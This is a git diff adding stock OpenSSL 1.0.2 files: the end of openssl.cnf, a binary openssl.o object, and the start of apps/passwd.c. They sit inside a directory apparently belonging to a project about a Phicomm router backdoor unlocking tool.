+# At this point in time, you must list all acceptable 'object'
+# types.
+[ policy_anything ]
+countryName		= optional
+stateOrProvinceName	= optional
+localityName		= optional
+organizationName	= optional
+organizationalUnitName	= optional
+commonName		= supplied
+emailAddress		= optional
+
+####################################################################
+[ req ]
+default_bits		= 2048
+default_keyfile 	= privkey.pem
+distinguished_name	= req_distinguished_name
+attributes		= req_attributes
+x509_extensions	= v3_ca	# The extentions to add to the self signed cert
+
+# Passwords for private keys if not present they will be prompted for
+# input_password = secret
+# output_password = secret
+
+# This sets a mask for permitted string types. There are several options. 
+# default: PrintableString, T61String, BMPString.
+# pkix	 : PrintableString, BMPString (PKIX recommendation before 2004)
+# utf8only: only UTF8Strings (PKIX recommendation after 2004).
+# nombstr : PrintableString, T61String (no BMPStrings or UTF8Strings).
+# MASK:XXXX a literal mask value.
+# WARNING: ancient versions of Netscape crash on BMPStrings or UTF8Strings.
+string_mask = utf8only
+
+# req_extensions = v3_req # The extensions to add to a certificate request
+
+[ req_distinguished_name ]
+countryName			= Country Name (2 letter code)
+countryName_default		= AU
+countryName_min			= 2
+countryName_max			= 2
+
+stateOrProvinceName		= State or Province Name (full name)
+stateOrProvinceName_default	= Some-State
+
+localityName			= Locality Name (eg, city)
+
+0.organizationName		= Organization Name (eg, company)
+0.organizationName_default	= Internet Widgits Pty Ltd
+
+# we can do this but it is not needed normally :-)
+#1.organizationName		= Second Organization Name (eg, company)
+#1.organizationName_default	= World Wide Web Pty Ltd
+
+organizationalUnitName		= Organizational Unit Name (eg, section)
+#organizationalUnitName_default	=
+
+commonName			= Common Name (e.g. server FQDN or YOUR name)
+commonName_max			= 64
+
+emailAddress			= Email Address
+emailAddress_max		= 64
+
+# SET-ex3			= SET extension number 3
+
+[ req_attributes ]
+challengePassword		= A challenge password
+challengePassword_min		= 4
+challengePassword_max		= 20
+
+unstructuredName		= An optional company name
+
+[ usr_cert ]
+
+# These extensions are added when 'ca' signs a request.
+
+# This goes against PKIX guidelines but some CAs do it and some software
+# requires this to avoid interpreting an end user certificate as a CA.
+
+basicConstraints=CA:FALSE
+
+# Here are some examples of the usage of nsCertType. If it is omitted
+# the certificate can be used for anything *except* object signing.
+
+# This is OK for an SSL server.
+# nsCertType			= server
+
+# For an object signing certificate this would be used.
+# nsCertType = objsign
+
+# For normal client use this is typical
+# nsCertType = client, email
+
+# and for everything including object signing:
+# nsCertType = client, email, objsign
+
+# This is typical in keyUsage for a client certificate.
+# keyUsage = nonRepudiation, digitalSignature, keyEncipherment
+
+# This will be displayed in Netscape's comment listbox.
+nsComment			= "OpenSSL Generated Certificate"
+
+# PKIX recommendations harmless if included in all certificates.
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid,issuer
+
+# This stuff is for subjectAltName and issuerAltname.
+# Import the email address.
+# subjectAltName=email:copy
+# An alternative to produce certificates that aren't
+# deprecated according to PKIX.
+# subjectAltName=email:move
+
+# Copy subject details
+# issuerAltName=issuer:copy
+
+#nsCaRevocationUrl		= http://www.domain.dom/ca-crl.pem
+#nsBaseUrl
+#nsRevocationUrl
+#nsRenewalUrl
+#nsCaPolicyUrl
+#nsSslServerName
+
+# This is required for TSA certificates.
+# extendedKeyUsage = critical,timeStamping
+
+[ v3_req ]
+
+# Extensions to add to a certificate request
+
+basicConstraints = CA:FALSE
+keyUsage = nonRepudiation, digitalSignature, keyEncipherment
+
+[ v3_ca ]
+
+
+# Extensions for a typical CA
+
+
+# PKIX recommendation.
+
+subjectKeyIdentifier=hash
+
+authorityKeyIdentifier=keyid:always,issuer
+
+# This is what PKIX recommends but some broken software chokes on critical
+# extensions.
+#basicConstraints = critical,CA:true
+# So we do this instead.
+basicConstraints = CA:true
+
+# Key usage: this is typical for a CA certificate. However since it will
+# prevent it being used as an test self-signed certificate it is best
+# left out by default.
+# keyUsage = cRLSign, keyCertSign
+
+# Some might want this also
+# nsCertType = sslCA, emailCA
+
+# Include email address in subject alt name: another PKIX recommendation
+# subjectAltName=email:copy
+# Copy issuer details
+# issuerAltName=issuer:copy
+
+# DER hex encoding of an extension: beware experts only!
+# obj=DER:02:03
+# Where 'obj' is a standard or added object
+# You can even override a supported extension:
+# basicConstraints= critical, DER:30:03:01:01:FF
+
+[ crl_ext ]
+
+# CRL extensions.
+# Only issuerAltName and authorityKeyIdentifier make any sense in a CRL.
+
+# issuerAltName=issuer:copy
+authorityKeyIdentifier=keyid:always
+
+[ proxy_cert_ext ]
+# These extensions should be added when creating a proxy certificate
+
+# This goes against PKIX guidelines but some CAs do it and some software
+# requires this to avoid interpreting an end user certificate as a CA.
+
+basicConstraints=CA:FALSE
+
+# Here are some examples of the usage of nsCertType. If it is omitted
+# the certificate can be used for anything *except* object signing.
+
+# This is OK for an SSL server.
+# nsCertType			= server
+
+# For an object signing certificate this would be used.
+# nsCertType = objsign
+
+# For normal client use this is typical
+# nsCertType = client, email
+
+# and for everything including object signing:
+# nsCertType = client, email, objsign
+
+# This is typical in keyUsage for a client certificate.
+# keyUsage = nonRepudiation, digitalSignature, keyEncipherment
+
+# This will be displayed in Netscape's comment listbox.
+nsComment			= "OpenSSL Generated Certificate"
+
+# PKIX recommendations harmless if included in all certificates.
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid,issuer
+
+# This stuff is for subjectAltName and issuerAltname.
+# Import the email address.
+# subjectAltName=email:copy
+# An alternative to produce certificates that aren't
+# deprecated according to PKIX.
+# subjectAltName=email:move
+
+# Copy subject details
+# issuerAltName=issuer:copy
+
+#nsCaRevocationUrl		= http://www.domain.dom/ca-crl.pem
+#nsBaseUrl
+#nsRevocationUrl
+#nsRenewalUrl
+#nsCaPolicyUrl
+#nsSslServerName
+
+# This really needs to be in place for it to be a proxy certificate.
+proxyCertInfo=critical,language:id-ppl-anyLanguage,pathlen:3,policy:foo
+
+####################################################################
+[ tsa ]
+
+default_tsa = tsa_config1	# the default TSA section
+
+[ tsa_config1 ]
+
+# These are used by the TSA reply generation only.
+dir		= ./demoCA		# TSA root directory
+serial		= $dir/tsaserial	# The current serial number (mandatory)
+crypto_device	= builtin		# OpenSSL engine to use for signing
+signer_cert	= $dir/tsacert.pem 	# The TSA signing certificate
+					# (optional)
+certs		= $dir/cacert.pem	# Certificate chain to include in reply
+					# (optional)
+signer_key	= $dir/private/tsakey.pem # The TSA private key (optional)
+
+default_policy	= tsa_policy1		# Policy if request did not specify it
+					# (optional)
+other_policies	= tsa_policy2, tsa_policy3	# acceptable policies (optional)
+digests		= md5, sha1		# Acceptable message digests (mandatory)
+accuracy	= secs:1, millisecs:500, microsecs:100	# (optional)
+clock_precision_digits  = 0	# number of digits after dot. (optional)
+ordering		= yes	# Is ordering defined for timestamps?
+				# (optional, default: no)
+tsa_name		= yes	# Must the TSA name be included in the reply?
+				# (optional, default: no)
+ess_cert_id_chain	= no	# Must the ESS cert id chain be included?
+				# (optional, default: no)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl.o
new file mode 100644
index 0000000000000000000000000000000000000000..2360611e70f495c1f84bccdb273d4e7aa5246f45
GIT binary patch
literal 25808
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/passwd.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/passwd.c
new file mode 100644
index 0000000..5ff53b5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/passwd.c
@@ -0,0 +1,494 @@
+/* apps/passwd.c */
+
+#if defined OPENSSL_NO_MD5 || defined CHARSET_EBCDIC
+# define NO_MD5CRYPT_1
+#endif
+
+#if !defined(OPENSSL_NO_DES) || !defined(NO_MD5CRYPT_1)
+
+# include <assert.h>
+# include <string.h>
+
+# include "apps.h"
+
+# include <openssl/bio.h>
+# include <openssl/err.h>
+# include <openssl/evp.h>
+# include <openssl/rand.h>
+# ifndef OPENSSL_NO_DES
+#  include <openssl/des.h>
+# endif
+# ifndef NO_MD5CRYPT_1
+#  include <openssl/md5.h>
+# endif
+
+# undef PROG
+# define PROG passwd_main
+
+static unsigned const char cov_2char[64] = {
+    /* from crypto/des/fcrypt.c */
+    0x2E, 0x2F, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35,
+    0x36, 0x37, 0x38, 0x39, 0x41, 0x42, 0x43, 0x44,
+    0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C,
+    0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x54,
+    0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x61, 0x62,
+    0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A,
+    0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72,
+    0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A
+};
+
+static int do_passwd(int passed_salt, char **salt_p, char **salt_malloc_p,
+                     char *passwd, BIO *out, int quiet, int table,
+                     int reverse, size_t pw_maxlen, int usecrypt, int use1,
+                     int useapr1);
+
+/*-
+ * -crypt        - standard Unix password algorithm (default)
+ * -1            - MD5-based password algorithm
+ * -apr1         - MD5-based password algorithm, Apache variant
+ * -salt string  - salt
+ * -in file      - read passwords from file
+ * -stdin        - read passwords from stdin
+ * -noverify     - never verify when reading password from terminal
+ * -quiet        - no warnings
+ * -table        - format output as table
+ * -reverse      - switch table columns
+ */
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    int ret = 1;
+    char *infile = NULL;
+    int in_stdin = 0;
+    int in_noverify = 0;
+    char *salt = NULL, *passwd = NULL, **passwds = NULL;
+    char *salt_malloc = NULL, *passwd_malloc = NULL;
+    size_t passwd_malloc_size = 0;
+    int pw_source_defined = 0;
+    BIO *in = NULL, *out = NULL;
+    int i, badopt, opt_done;
+    int passed_salt = 0, quiet = 0, table = 0, reverse = 0;
+    int usecrypt = 0, use1 = 0, useapr1 = 0;
+    size_t pw_maxlen = 0;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto err;
+    out = BIO_new(BIO_s_file());
+    if (out == NULL)
+        goto err;
+    BIO_set_fp(out, stdout, BIO_NOCLOSE | BIO_FP_TEXT);
+# ifdef OPENSSL_SYS_VMS
+    {
+        BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+        out = BIO_push(tmpbio, out);
+    }
+# endif
+
+    badopt = 0, opt_done = 0;
+    i = 0;
+    while (!badopt && !opt_done && argv[++i] != NULL) {
